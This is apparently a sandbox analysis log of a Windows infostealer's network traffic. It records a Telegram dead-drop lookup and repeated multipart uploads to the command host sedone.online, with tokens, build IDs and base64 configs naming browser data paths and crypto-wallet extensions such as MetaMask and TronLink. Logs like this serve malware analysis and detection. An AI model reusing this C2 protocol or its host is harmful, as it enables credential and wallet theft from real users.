Dec 16, 2024 13:47:19.610693932 CET | 1.1.1.1 | 192.168.2.8 | 0x2a69 | No error (0) | sb.scorecardresearch.com | | 18.165.220.106 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:47:19.610693932 CET | 1.1.1.1 | 192.168.2.8 | 0x2a69 | No error (0) | sb.scorecardresearch.com | | 18.165.220.66 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:47:19.611375093 CET | 1.1.1.1 | 192.168.2.8 | 0xbf5b | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 13:47:19.612114906 CET | 1.1.1.1 | 192.168.2.8 | 0x8387 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49712 | 149.154.167.99 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:46:39 UTC | 86 | OUT | GET /detct0r HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:46:40 UTC | 511 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 16 Dec 2024 12:46:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12323
Connection: close
Set-Cookie: stel_ssid=21bc063e498960a65f_4389036794589904343; expires=Tue, 17 Dec 2024 12:46:39 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2024-12-16 12:46:40 UTC | 12323 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @detct0r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49713 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:46:42 UTC | 233 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:46:42 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:46:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 12:46:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                2192.168.2.849714116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:46:44 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EUAIEC2689RIEUKNOH47
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 256
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 12:46:44 UTC | 256 | OUT |
                                                                                                                                                                                                                                                                Data Ascii: ------EUAIEC2689RIEUKNOH47Content-Disposition: form-data; name="hwid"D74525F19F0A1633047986-a33c7340-61ca------EUAIEC2689RIEUKNOH47Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------EUAIEC2689RIEUKNOH47--
2024-12-16 12:46:45 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:45 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
2024-12-16 12:46:45 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 3a1|1|1|1|fe74653fe5362dc417272058eafcad35|1|0|1|1|0|50000|00


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49715 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:46:46 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AS268YUKFUSRQQ9RIM79
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 12:46:46 UTC | 331 | OUT |
                                                                                                                                                                                                                                                                Data Ascii: ------AS268YUKFUSRQQ9RIM79Content-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------AS268YUKFUSRQQ9RIM79Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------AS268YUKFUSRQQ9RIM79Cont
2024-12-16 12:46:47 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:47 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
2024-12-16 12:46:47 UTC | 2192 | IN |
                                                                                                                                                                                                                                                                Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49716 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:46:49 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----D2NY5P8Q9RQIMYUSJEU3
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 12:46:49 UTC | 331 | OUT |
                                                                                                                                                                                                                                                                Data Ascii: ------D2NY5P8Q9RQIMYUSJEU3Content-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------D2NY5P8Q9RQIMYUSJEU3Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------D2NY5P8Q9RQIMYUSJEU3Cont
2024-12-16 12:46:49 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:49 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
2024-12-16 12:46:49 UTC | 5837 | IN |
                                                                                                                                                                                                                                                                Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49718 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:46:51 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ZCTRQ9R1VKF3EU3OZCT0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 332
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 12:46:51 UTC | 332 | OUT |
                                                                                                                                                                                                                                                                Data Ascii: ------ZCTRQ9R1VKF3EU3OZCT0Content-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------ZCTRQ9R1VKF3EU3OZCT0Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------ZCTRQ9R1VKF3EU3OZCT0Cont
2024-12-16 12:46:52 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:51 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
2024-12-16 12:46:52 UTC | 119 | IN |
                                                                                                                                                                                                                                                                Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49719 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:46:53 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JE3OP8YU3EKF3EU3OZ5P
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 6613
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 12:46:53 UTC | 6613 | OUT |
                                                                                                                                                                                                                                                                Data Ascii: ------JE3OP8YU3EKF3EU3OZ5PContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------JE3OP8YU3EKF3EU3OZ5PContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------JE3OP8YU3EKF3EU3OZ5PCont
2024-12-16 12:46:54 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:54 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
2024-12-16 12:46:54 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49720 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:46:54 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JE3OP8YU3EKF3EU3OZ5P
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 489
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 12:46:54 UTC | 489 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 38 59 55 33 45 4b 46 33 45 55 33 4f 5a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 38 59 55 33 45 4b 46 33 45 55 33 4f 5a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 38 59 55 33 45 4b 46 33 45 55 33 4f 5a 35 50 0d 0a 43 6f 6e 74
Data Ascii: ------JE3OP8YU3EKF3EU3OZ5PContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------JE3OP8YU3EKF3EU3OZ5PContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------JE3OP8YU3EKF3EU3OZ5PCont
2024-12-16 12:46:55 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:55 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
2024-12-16 12:46:55 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49724 | 142.250.181.68 | 443 | 2168 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:46:57 UTC | 603 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-12-16 12:46:58 UTC | 1266 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:58 GMT
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-sDej1EI5UYhTx01dEHgV3A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49727 | 142.250.181.68 | 443 | 2168 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:46:58 UTC | 506 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-16 12:46:59 UTC | 1018 | IN | HTTP/1.1 200 OK
Version: 704583840
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Mon, 16 Dec 2024 12:46:58 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                10192.168.2.849728142.250.181.684432168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:46:58 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-12-16 12:46:59 UTC | 933 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Version: 704583840
                                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:58 GMT
                                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
2024-12-16 12:46:59 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-16 12:46:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49738 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:02 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----PH4EU37QIEUAAASR9H4E
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 505
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 12:47:02 UTC | 505 | OUT | Data Ascii: ------PH4EU37QIEUAAASR9H4EContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------PH4EU37QIEUAAASR9H4EContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------PH4EU37QIEUAAASR9H4ECont
2024-12-16 12:47:03 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:03 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
2024-12-16 12:47:03 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 49740 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:03 UTC | 328 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----B1DBAIWTRQIE3E3OH4EC
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 213453
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 12:47:03 UTC | 16355 | OUT | Data Ascii: ------B1DBAIWTRQIE3E3OH4ECContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------B1DBAIWTRQIE3E3OH4ECContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------B1DBAIWTRQIE3E3OH4ECCont
2024-12-16 12:47:05 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49742 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:06 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GLFCJE3OP8YUAIWLN7GV
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:06 UTC | 16355 | OUT | Data Ascii:
------GLFCJE3OP8YUAIWLN7GV
Content-Disposition: form-data; name="token"

fe74653fe5362dc417272058eafcad35
------GLFCJE3OP8YUAIWLN7GV
Content-Disposition: form-data; name="build_id"

294acdd3f4c6dd4a258e9798170c0159
------GLFCJE3OP8YUAIWLN7GV
Cont
2024-12-16 12:47:07 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
